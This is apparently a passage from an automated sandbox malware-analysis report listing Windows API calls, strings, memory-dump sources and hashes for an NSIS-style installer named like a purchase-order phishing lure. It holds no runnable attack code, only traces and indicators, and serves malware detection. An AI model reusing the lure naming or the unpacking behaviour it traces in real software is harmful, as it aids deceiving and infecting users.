                                                              • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                              • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                              • String ID:
                                                              • API String ID: 3294113728-0
                                                              • Opcode ID: 38bdd8529c47ea5edffceb92d72af5ec9064ba07a11341120463422747a5320d
                                                              • Instruction ID: 760673b96d72cef8a70f9bf76d43f75bad9b7db283b6dfdc5a98cea5addec372
                                                              • Opcode Fuzzy Hash: 38bdd8529c47ea5edffceb92d72af5ec9064ba07a11341120463422747a5320d
                                                              • Instruction Fuzzy Hash: A631A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                              • GetTickCount.KERNEL32 ref: 00402D53
                                                              • wsprintfW.USER32 ref: 00402D81
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                • Part of subcall function 00402CFE: MulDiv.KERNEL32(00060170,00000064,000630BE), ref: 00402D13
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                              • String ID: ... %d%%
                                                              • API String ID: 722711167-2449383134
                                                              • Opcode ID: e27c2f7dbee131dbdfcdd41b567a98c3097ab4c9f03de6157def9e8d5b287b15
                                                              • Instruction ID: 78f52ac4307216ae4daf114a653e214d9194ffd889c5bb91718f5c3abb157098
                                                              • Opcode Fuzzy Hash: e27c2f7dbee131dbdfcdd41b567a98c3097ab4c9f03de6157def9e8d5b287b15
                                                              • Instruction Fuzzy Hash: D1015E31909220EBC7616B64EE5DBDA3AA8AF00704B14457BF905B11F5C6B85C45CFAE
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B19
                                                              • GetMessagePos.USER32 ref: 00404B21
                                                              • ScreenToClient.USER32(?,?), ref: 00404B3B
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B4D
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                              • Instruction ID: 7d165c7f7153624e3963f679d066e3c154625e4b871d361bb7407d5cf98d8b00
                                                              • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                              • Instruction Fuzzy Hash: 97014C71D00219BADB00DB94DD85FFEBBBCAB59711F10412ABB10B71D0D7B4A9018BA5
                                                              APIs
                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9D
                                                              • wsprintfW.USER32 ref: 00402CD1
                                                              • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                              • API String ID: 1451636040-1158693248
                                                              • Opcode ID: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                              • Instruction ID: 1a6e545745197b7d5f0e024d91f0b7ce6738c211f373f8126abe8c19e9ad5020
                                                              • Opcode Fuzzy Hash: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                              • Instruction Fuzzy Hash: A6F03670504108BBEF205F50DD4ABEE3768FB00309F00843AFA16B51D1DBB95959DF59
                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                              • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2369517507.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2369497623.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369537423.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369556194.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                              • String ID:
                                                              • API String ID: 4216380887-0
                                                              • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                              • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                              • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                              • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                              APIs
                                                                • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                              • GlobalFree.KERNEL32(?), ref: 10002572
                                                              • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2369517507.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2369497623.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369537423.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369556194.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                              • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                              • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                              • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                              APIs
                                                              • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                              • wsprintfW.USER32 ref: 00404A9A
                                                              • SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s$&B
                                                              • API String ID: 3540041739-2907463167
                                                              • Opcode ID: 9513d2e047af43577a24336e7432a2aba40062ca47d724a60bbce7168ae92968
                                                              • Instruction ID: ab388700b69d78aa859054a1700c1a1d69e67ce61d201efd873ebc4ad7f6fd90
                                                              • Opcode Fuzzy Hash: 9513d2e047af43577a24336e7432a2aba40062ca47d724a60bbce7168ae92968
                                                              • Instruction Fuzzy Hash: 4F11D8736441282BDB00656D9C45E9F328DDB85334F154237FA25F71D1EA78CC2286E9
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2369517507.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2369497623.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369537423.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369556194.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FreeGlobal
                                                              • String ID:
                                                              • API String ID: 2979337801-0
                                                              • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                              • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                              • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                              • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                              • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2369517507.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2369497623.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369537423.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369556194.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                              • String ID:
                                                              • API String ID: 1148316912-0
                                                              • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                              • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                              • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                              • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                              • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                              • DeleteObject.GDI32(00000000), ref: 00401D36
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                              • String ID:
                                                              • API String ID: 1849352358-0
                                                              • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                              • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                              • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                              • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401D44
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                              • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                              • String ID:
                                                              • API String ID: 3808545654-0
                                                              • Opcode ID: dc25ff1ab83189895f2e894faf43e64dd9f4cfc638364393878e19842c49e524
                                                              • Instruction ID: 8995593179462595128303b368e9330df260c28bd2cead9704070f65c6b7920e
                                                              • Opcode Fuzzy Hash: dc25ff1ab83189895f2e894faf43e64dd9f4cfc638364393878e19842c49e524
                                                              • Instruction Fuzzy Hash: 1F016D71948285EFEB416BB0AE0AFDABF74EB65305F144479F201B62E2C77C10058B6E
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                              • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                              • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                              • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405EA4
                                                              • RegCloseKey.ADVAPI32(?,?,004060CC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405EC7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Call
                                                              • API String ID: 3677997916-1824292864
                                                              • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                              • Instruction ID: 99b29286c29c4417609fc152e7ab7d49c37a34cf298751ff58d773eaaaf64e16
                                                              • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                              • Instruction Fuzzy Hash: 0501483215020AEADB218F16ED08E9B3BA8EF44351F00443AF944D2220E335DA60CBE5
                                                              APIs
                                                              • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,75572EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"), ref: 00405A90
                                                              • CharNextW.USER32(00000000), ref: 00405A95
                                                              • CharNextW.USER32(00000000), ref: 00405AAD
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nsu68B6.tmp, xrefs: 00405A83
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CharNext
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsu68B6.tmp
                                                              • API String ID: 3213498283-3017966712
                                                              • Opcode ID: 4650fa990997f8469f94077bac91aaa1730da3b5ce12b11342ea2826d17ce8e9
                                                              • Instruction ID: 5ad67665fffd931dad9daf24cd7e721830b1e1cd98268fde7792f953d01aa38a
                                                              • Opcode Fuzzy Hash: 4650fa990997f8469f94077bac91aaa1730da3b5ce12b11342ea2826d17ce8e9
